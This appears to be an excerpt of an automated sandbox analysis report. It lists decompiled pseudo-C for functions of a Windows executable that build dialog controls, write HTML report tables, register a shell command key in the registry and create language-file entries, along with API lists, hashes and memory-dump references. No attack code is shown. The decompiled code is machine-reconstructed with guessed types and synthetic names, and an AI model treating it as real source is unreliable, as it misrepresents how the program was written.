					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                        0x00403c09
                                                                                                        0x00403c0c
                                                                                                        0x00403c11
                                                                                                        0x00403c1b
                                                                                                        0x00403c3f
                                                                                                        0x00403c4a
                                                                                                        0x00403c6e
                                                                                                        0x00403c96
                                                                                                        0x00403c9a
                                                                                                        0x00403ca6
                                                                                                        0x00403cb3
                                                                                                        0x00403cb8
                                                                                                        0x00403cc5
                                                                                                        0x00403cca
                                                                                                        0x00403cdd
                                                                                                        0x00403ce6
                                                                                                        0x00403cf8
                                                                                                        0x00403d11
                                                                                                        0x00403d26
                                                                                                        0x00403d3f
                                                                                                        0x00403d54
                                                                                                        0x00403d6d
                                                                                                        0x00403d76
                                                                                                        0x00403d88
                                                                                                        0x00403d9e
                                                                                                        0x00403db0
                                                                                                        0x00403db5
                                                                                                        0x00403dc4
                                                                                                        0x00403dc8
                                                                                                        0x00403dc9
                                                                                                        0x00403dca
                                                                                                        0x00403dda
                                                                                                        0x00403ddf
                                                                                                        0x00403de2
                                                                                                        0x00403de3
                                                                                                        0x00403df4
                                                                                                        0x00403df8
                                                                                                        0x00403df9
                                                                                                        0x00403dfa
                                                                                                        0x00403e0a
                                                                                                        0x00403e0f
                                                                                                        0x00403e12
                                                                                                        0x00403e13
                                                                                                        0x00403e22
                                                                                                        0x00403e26
                                                                                                        0x00403e28
                                                                                                        0x00403e29
                                                                                                        0x00403e39
                                                                                                        0x00403e3e
                                                                                                        0x00403e41
                                                                                                        0x00403e42
                                                                                                        0x00403e51
                                                                                                        0x00403e55
                                                                                                        0x00403e57
                                                                                                        0x00403e58
                                                                                                        0x00403e68
                                                                                                        0x00403e6d
                                                                                                        0x00403e70
                                                                                                        0x00403e71
                                                                                                        0x00403e71
                                                                                                        0x00403e87
                                                                                                        0x00403e8d
                                                                                                        0x00403e9e
                                                                                                        0x00403ea6
                                                                                                        0x00403eaf
                                                                                                        0x00403ebc

                                                                                                        APIs
                                                                                                          • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                          • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                          • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                          • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                        • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                        • GetDlgItem.USER32 ref: 00403C2F
                                                                                                        • SetWindowLongW.USER32 ref: 00403C39
                                                                                                          • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                          • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                          • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                          • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                        • LoadImageW.USER32 ref: 00403C6A
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                        • LoadImageW.USER32 ref: 00403C7F
                                                                                                        • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                        • GetDlgItem.USER32 ref: 00403CB0
                                                                                                          • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                          • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                        • GetDlgItem.USER32 ref: 00403CC2
                                                                                                        • GetDlgItem.USER32 ref: 00403CD4
                                                                                                          • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                          • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                          • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                          • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                          • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                          • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                          • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                          • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                        • GetDlgItem.USER32 ref: 00403D64
                                                                                                        • GetDlgItem.USER32 ref: 00403DC0
                                                                                                        • GetDlgItem.USER32 ref: 00403DF0
                                                                                                        • GetDlgItem.USER32 ref: 00403E20
                                                                                                        • GetDlgItem.USER32 ref: 00403E4F
                                                                                                        • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                        • GetDlgItem.USER32 ref: 00403E9B
                                                                                                        • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1038210931-0
                                                                                                        • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                        • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                        • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                        • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 56%
                                                                                                        			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                                        0x00407763
                                                                                                        0x0040776c
                                                                                                        0x00407784
                                                                                                        0x0040778b
                                                                                                        0x00407797
                                                                                                        0x00407799
                                                                                                        0x0040779b
                                                                                                        0x004077a7
                                                                                                        0x004077ae
                                                                                                        0x004077bd
                                                                                                        0x004077c4
                                                                                                        0x004077d3
                                                                                                        0x004077da
                                                                                                        0x004077e1
                                                                                                        0x004077e6
                                                                                                        0x004077f2
                                                                                                        0x004077f5
                                                                                                        0x00407804
                                                                                                        0x00407805
                                                                                                        0x00407810
                                                                                                        0x00407812
                                                                                                        0x00407813
                                                                                                        0x00407818
                                                                                                        0x00407818
                                                                                                        0x00407825
                                                                                                        0x0040782d
                                                                                                        0x00407830
                                                                                                        0x0040783a
                                                                                                        0x00407840
                                                                                                        0x00407846
                                                                                                        0x00407849
                                                                                                        0x00407850
                                                                                                        0x0040785e
                                                                                                        0x00407864
                                                                                                        0x00407867
                                                                                                        0x0040786b
                                                                                                        0x0040786f
                                                                                                        0x00407877
                                                                                                        0x0040787a
                                                                                                        0x00407885
                                                                                                        0x00407892
                                                                                                        0x004078a8
                                                                                                        0x004078b8
                                                                                                        0x004078c5
                                                                                                        0x004078ff
                                                                                                        0x004078c7
                                                                                                        0x004078ca
                                                                                                        0x004078dd
                                                                                                        0x004078de
                                                                                                        0x004078e3
                                                                                                        0x004078e8
                                                                                                        0x004078eb
                                                                                                        0x004078f0
                                                                                                        0x004078f0
                                                                                                        0x00407906
                                                                                                        0x00407909
                                                                                                        0x0040790f
                                                                                                        0x0040791d
                                                                                                        0x00407923
                                                                                                        0x0040792d
                                                                                                        0x00407932
                                                                                                        0x0040793b
                                                                                                        0x00407942
                                                                                                        0x00407943
                                                                                                        0x0040794c
                                                                                                        0x00407953
                                                                                                        0x00407954
                                                                                                        0x00407959
                                                                                                        0x0040795c
                                                                                                        0x00407961
                                                                                                        0x0040796c
                                                                                                        0x00407971
                                                                                                        0x0040797a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00407838
                                                                                                        0x00407838
                                                                                                        0x0040783a
                                                                                                        0x00407980
                                                                                                        0x0040798a
                                                                                                        0x004079a1

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                        • API String ID: 1607361635-601624466
                                                                                                        • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                        • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                        • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                        • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 40%
                                                                                                        			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                        0x00407b65
                                                                                                        0x00407b7c
                                                                                                        0x00407b83
                                                                                                        0x00407b91
                                                                                                        0x00407b98
                                                                                                        0x00407ba6
                                                                                                        0x00407bad
                                                                                                        0x00407bb2
                                                                                                        0x00407bb9
                                                                                                        0x00407bca
                                                                                                        0x00407bcb
                                                                                                        0x00407bd6
                                                                                                        0x00407bdb
                                                                                                        0x00407bdc
                                                                                                        0x00407be1
                                                                                                        0x00407be1
                                                                                                        0x00407be8
                                                                                                        0x00407bf9
                                                                                                        0x00407bfa
                                                                                                        0x00407c05
                                                                                                        0x00407c0a
                                                                                                        0x00407c0b
                                                                                                        0x00407c1c
                                                                                                        0x00407c21
                                                                                                        0x00407c21
                                                                                                        0x00407c2a
                                                                                                        0x00407c2b
                                                                                                        0x00407c36
                                                                                                        0x00407c3b
                                                                                                        0x00407c3c
                                                                                                        0x00407c41
                                                                                                        0x00407c51
                                                                                                        0x00407c56
                                                                                                        0x00407c5b
                                                                                                        0x00407c65
                                                                                                        0x00407c68
                                                                                                        0x00407c6b
                                                                                                        0x00407c74
                                                                                                        0x00407c7b
                                                                                                        0x00407c80
                                                                                                        0x00407c82
                                                                                                        0x00407c88
                                                                                                        0x00407ca6
                                                                                                        0x00407c8a
                                                                                                        0x00407c8a
                                                                                                        0x00407c8b
                                                                                                        0x00407c96
                                                                                                        0x00407c9b
                                                                                                        0x00407c9c
                                                                                                        0x00407ca1
                                                                                                        0x00407ca1
                                                                                                        0x00407cb3
                                                                                                        0x00407cb4
                                                                                                        0x00407cbd
                                                                                                        0x00407cc4
                                                                                                        0x00407cc5
                                                                                                        0x00407cd0
                                                                                                        0x00407cd5
                                                                                                        0x00407cd6
                                                                                                        0x00407cdb
                                                                                                        0x00407ceb
                                                                                                        0x00407cf0
                                                                                                        0x00407cf3
                                                                                                        0x00407cf3
                                                                                                        0x00407cf3
                                                                                                        0x00000000
                                                                                                        0x00407cfc
                                                                                                        0x00407d00

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintf$memset$wcscpy
                                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                        • API String ID: 2000436516-3842416460
                                                                                                        • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                        • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                        • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                        • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 51%
                                                                                                        			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                        0x00404415
                                                                                                        0x0040441d
                                                                                                        0x0040442c
                                                                                                        0x00404435
                                                                                                        0x004045b3
                                                                                                        0x004045b7
                                                                                                        0x004045b7
                                                                                                        0x0040444b
                                                                                                        0x00404452
                                                                                                        0x00404457
                                                                                                        0x00404460
                                                                                                        0x00404461
                                                                                                        0x00404462
                                                                                                        0x0040446d
                                                                                                        0x00404472
                                                                                                        0x00404473
                                                                                                        0x00404490
                                                                                                        0x004044a5
                                                                                                        0x004044b4
                                                                                                        0x004044b6
                                                                                                        0x004044b7
                                                                                                        0x004044bd
                                                                                                        0x004044cf
                                                                                                        0x004044db
                                                                                                        0x004044eb
                                                                                                        0x004044f1
                                                                                                        0x004044f6
                                                                                                        0x004044f9
                                                                                                        0x004044fe
                                                                                                        0x00404506
                                                                                                        0x00404507
                                                                                                        0x00404508
                                                                                                        0x00404510
                                                                                                        0x00404521
                                                                                                        0x00404532
                                                                                                        0x00404539
                                                                                                        0x00404547
                                                                                                        0x0040454e
                                                                                                        0x0040455b
                                                                                                        0x0040455c
                                                                                                        0x00404564
                                                                                                        0x0040456f
                                                                                                        0x00404570
                                                                                                        0x00404571
                                                                                                        0x0040457c
                                                                                                        0x0040457d
                                                                                                        0x00404588
                                                                                                        0x00404589
                                                                                                        0x0040458a
                                                                                                        0x004045a0
                                                                                                        0x004045a5
                                                                                                        0x00404521
                                                                                                        0x004044eb
                                                                                                        0x004045ab
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00404452
                                                                                                        • _snwprintf.MSVCRT ref: 00404473
                                                                                                          • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                          • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                          • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                        • memset.MSVCRT ref: 004044CF
                                                                                                          • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                        • memset.MSVCRT ref: 00404539
                                                                                                        • memset.MSVCRT ref: 0040454E
                                                                                                        • _snwprintf.MSVCRT ref: 00404571
                                                                                                        • _snwprintf.MSVCRT ref: 0040458A
                                                                                                          • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                        • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                        • API String ID: 486436031-734527199
                                                                                                        • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                        • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                        • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                        • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                        0x00406466
                                                                                                        0x0040647d
                                                                                                        0x00406484
                                                                                                        0x00406499
                                                                                                        0x004064a0
                                                                                                        0x004064af
                                                                                                        0x004064b4
                                                                                                        0x004064bb
                                                                                                        0x004064cd
                                                                                                        0x004064d2
                                                                                                        0x004064d4
                                                                                                        0x004064e4
                                                                                                        0x004064ea
                                                                                                        0x004064ea
                                                                                                        0x004064f3
                                                                                                        0x00406503
                                                                                                        0x00406514
                                                                                                        0x00406525
                                                                                                        0x0040653b
                                                                                                        0x0040654e
                                                                                                        0x00406568
                                                                                                        0x00406572
                                                                                                        0x0040657a
                                                                                                        0x00406582
                                                                                                        0x0040658a
                                                                                                        0x00406596

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00406484
                                                                                                        • memset.MSVCRT ref: 004064A0
                                                                                                          • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                          • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                          • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
